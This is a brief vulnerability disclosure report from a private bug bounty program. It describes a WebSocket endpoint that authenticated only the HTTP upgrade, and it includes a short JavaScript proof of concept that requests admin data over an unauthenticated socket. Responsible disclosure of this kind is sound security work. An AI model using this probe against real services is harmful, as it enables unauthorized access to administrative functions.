WebSocket Private Program 2024-09-01
WebSocket Connection Lacks Authentication
Severity: High | Status: Resolved
Summary
The real-time WebSocket endpoint only validated authentication on HTTP upgrade but not on WebSocket messages.
Proof of Concept
ws = new WebSocket('wss://target.com/ws');
ws.onopen = () => ws.send(JSON.stringify({
action: 'getAdminData'
}));Impact
Unauthorized access to real-time admin functionality.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.